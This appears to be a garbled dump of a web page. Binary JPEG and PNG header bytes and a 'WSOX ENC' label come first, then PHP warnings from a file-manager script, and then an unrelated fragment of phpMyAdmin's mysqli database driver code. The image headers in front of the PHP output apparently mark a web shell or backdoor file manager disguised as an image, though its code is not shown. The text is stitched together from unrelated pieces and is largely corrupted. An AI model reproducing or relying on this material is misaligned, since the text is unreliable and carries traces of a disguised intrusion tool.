1:45 PM 11/12/2025 ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC ‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!
Warning: Undefined variable $authorization in C:\xampp\htdocs\demo\fi.php on line 57

Warning: Undefined variable $translation in C:\xampp\htdocs\demo\fi.php on line 118

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\demo\fi.php on line 119

Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in C:\xampp\htdocs\demo\fi.php on line 120

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 247

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 248

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 249

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 250

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 251

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 252
ssl_set( $server['ssl_key'] ?? '', $server['ssl_cert'] ?? '', $server['ssl_ca'] ?? '', $server['ssl_ca_path'] ?? '', $server['ssl_ciphers'] ?? '' ); } /* * disables SSL certificate validation on mysqlnd for MySQL 5.6 or later * @link https://bugs.php.net/bug.php?id=68344 * @link https://github.com/phpmyadmin/phpmyadmin/pull/11838 */ if (! $server['ssl_verify']) { $mysqli->options(MYSQLI_OPT_SSL_VERIFY_SERVER_CERT, (int) $server['ssl_verify']); $client_flags |= MYSQLI_CLIENT_SSL_DONT_VERIFY_SERVER_CERT; } } if ($GLOBALS['cfg']['PersistentConnections']) { $host = 'p:' . $server['host']; } else { $host = $server['host']; } if ($server['hide_connection_errors']) { $return_value = @$mysqli->real_connect( $host, $user, $password, '', $server['port'], (string) $server['socket'], $client_flags ); } else { $return_value = $mysqli->real_connect( $host, $user, $password, '', $server['port'], (string) $server['socket'], $client_flags ); } if ($return_value === false) { /* * Switch to SSL if server asked us to do so, unfortunately * there are more ways MySQL server can tell this: * * - MySQL 8.0 and newer should return error 3159 * - #2001 - SSL Connection is required. Please specify SSL options and retry. * - #9002 - SSL connection is required. Please specify SSL options and retry. */ // phpcs:disable Squiz.NamingConventions.ValidVariableName.MemberNotCamelCaps $error_number = $mysqli->connect_errno; $error_message = $mysqli->connect_error; // phpcs:enable if ( ! $server['ssl'] && ($error_number == 3159 || (($error_number == 2001 || $error_number == 9002) && stripos($error_message, 'SSL Connection is required') !== false)) ) { trigger_error( __('SSL connection enforced by server, automatically enabling it.'), E_USER_WARNING ); $server['ssl'] = true; return self::connect($user, $password, $server); } if ($error_number === 1045 && $server['hide_connection_errors']) { trigger_error( sprintf( __( 'Error 1045: Access denied for user. Additional error information' . ' may be available, but is being hidden by the %s configuration directive.' ), '[code][doc@cfg_Servers_hide_connection_errors]' . '$cfg[\'Servers\'][$i][\'hide_connection_errors\'][/doc][/code]' ), E_USER_ERROR ); } return false; } $mysqli->options(MYSQLI_OPT_LOCAL_INFILE, (int) defined('PMA_ENABLE_LDI')); return $mysqli; } /** * selects given database * * @param string|DatabaseName $databaseName database name to select * @param mysqli $link the mysqli object */ public function selectDb($databaseName, $link): bool { return $link->select_db((string) $databaseName); } /** * runs a query and returns the result * * @param string $query query to execute * @param mysqli $link mysqli object * @param int $options query options * * @return MysqliResult|false */ public function realQuery(string $query, $link, int $options) { $method = MYSQLI_STORE_RESULT; if ($options == ($options | DatabaseInterface::QUERY_UNBUFFERED)) { $method = MYSQLI_USE_RESULT; } $result = $link->query($query, $method); if ($result === false) { return false; } return new MysqliResult($result); } /** * Run the multi query and output the results * * @param mysqli $link mysqli object * @param string $query multi query statement to execute */ public function realMultiQuery($link, $query): bool { return $link->multi_query($query); } /** * Check if there are any more query results from a multi query * * @param mysqli $link the mysqli object */ public function moreResults($link): bool { return $link->more_results(); } /** * Prepare next result from multi_query * * @param mysqli $link the mysqli object */ public function nextResult($link): bool { return $link->next_result(); } /** * Store the result returned from multi query * * @param mysqli $link the mysqli object * * @return MysqliResult|false false when empty results / result set when not empty */ public function storeResult($link) { $result = $link->store_result(); return $result === false ? false : new MysqliResult($result); } /** * Returns a string representing the type of connection used * * @param mysqli $link mysql link * * @return string type of connection used */ public function getHostInfo($link) { // phpcs:ignore Squiz.NamingConventions.ValidVariableName.MemberNotCamelCaps return $link->host_info; } /** * Returns the version of the MySQL protocol used * * @param mysqli $link mysql link * * @return string version of the MySQL protocol used */ public function getProtoInfo($link) { // phpcs:ignore Squiz.NamingConventions.ValidVariableName.MemberNotCamelCaps return $link->protocol_version; } /** * returns a string that represents the client library version * * @return string MySQL client library version */ public function getClientInfo() { return mysqli_get_client_info(); } /** * Returns last error message or an empty string if no errors occurred. * * @param mysqli|false|null $link mysql link */ public function getError($link): string { $GLOBALS['errno'] = 0; if ($link !== null && $link !== false) { $error_number = $link->errno; $error_message = $link->error; } else { $error_number = mysqli_connect_errno(); $error_message = (string) mysqli_connect_error(); } if ($error_number === 0 || $error_message === '') { return ''; } // keep the error number for further check after // the call to getError() $GLOBALS['errno'] = $error_number; return Utilities::formatError($error_number, $error_message); } /** * returns the number of rows affected by last query * * @param mysqli $link the mysqli object * * @return int|string * @psalm-return int|numeric-string */ public function affectedRows($link) { // phpcs:ignore Squiz.NamingConventions.ValidVariableName.MemberNotCamelCaps return $link->affected_rows; } /** * returns properly escaped string for use in MySQL queries * * @param mysqli $link database link * @param string $string string to be escaped * * @return string a MySQL escaped string */ public function escapeString($link, $string) { return $link->real_escape_string($string); } /** * Prepare an SQL statement for execution. * * @param mysqli $link database link * @param string $query The query, as a string. * * @return mysqli_stmt|false A statement object or false. */ public function prepare($link, string $query) { return $link->prepare($query); } }